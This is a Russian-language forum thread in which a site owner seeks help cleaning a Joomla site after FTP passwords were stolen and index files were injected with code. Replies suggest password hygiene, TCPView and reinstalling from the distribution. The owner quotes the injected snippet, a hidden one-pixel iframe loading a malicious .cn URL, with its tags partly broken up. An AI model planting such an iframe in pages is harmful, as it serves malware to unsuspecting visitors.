Здравствуйте, помогите пожалуйста победить вирус.. с неделю как на сайте завелся вирус, сначала просто при редактировании уже опублекованной статьи, редактор открывался в чистом виде и невозможно было зайти в хтмл-редактор, пока искала причину этих косяков.. поняла что таки вирус... вроде стандартный Downloader.JS.Psyme.ct, угнал пароли с ФТР и вписал в index свой хтмл-код в виде Код: <____html><body><i_______frame src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></i____frame> </body></____html> я сменила все пароли доступа к фтп, к админке сайта, к админке хостинга.. потом пол ночи руками выковыривала из всех index вредоносный код, кстати говоря, проверка двумя антивирями.. не нашел таки вируса, значит новеньки.. вобщем почистила я все index.. но сегодня захожу в админку, открываю одну из статей в редакторе а потом всю это страницу вместе с редактором, через браузер открываю в хтмл и нахожу там этот чертов код.. в самом index.php сайта его нету, если открываю сайт в хтмл не заходя в админку тож нету.. а вот когда открываю из админки (открывается в блокноте в файле index2(1)) то код там... ну как его искоренить?!! помогите.. сил нету..
обсуждалось... но не говорилось как именно все это вылечить...(( там все прожженные и бошкавитые.. а я ваще махонькая и хрупкая ламерша...
Просто вы не прочитали до конца: 1 Не храните пароли в клиентах (командеры, IE и прочяя) 2 Поставьте фаервол 3 По возможности заливайте файлы на ФТП по зашифрованному каналу PuTTY например 4 Не используй Ослика, и обновляйте браузер
это все понятно уже.. это все на будущее.. а что сейчас сделать?? как окончательно вычистить вирус??.. пс. перешла в ту темы за помощью...
Найти у себя виря, который слушает 21 порт (он всех базах АВР есть). Сделать дамп базы с сайта, переустановить джумлу, компоненты (с удалением старого, картинки можно не трогать), восстановить с базы.
не могу найти вирь, ни КАВ ни д.вебер не находят... а если не перустанавливать джумлу, а перезалить файлы дистрибктивов?
Да, только старое обязательно удалить. Если не можете найти вирус, скачайте TCPView, показывает все процессы, использующие интернет-соединения. Запустив TCPView, можно узнать, какой порт открыт и какое приложение его использует, а при необходимости и немедленно разорвать соединение.
я сделала проще, заменила все папки.. папками из дистрибутива.. и все нормально, пока вируса не замечала.. только у меня теперь не работает визуальный редактор.. редактировать статьи или вывешивать новые.. возможно теперь только если отключить его... но уже ток ручками прописывать коды... Кто всталкивался с подобным?? подскажите??
УСЕ! проблема с визуальным редактором решилась простым добавлением WWW в строку адреса..)) Всем спасибо огромное за помощь... одна б я повесилась..)))))
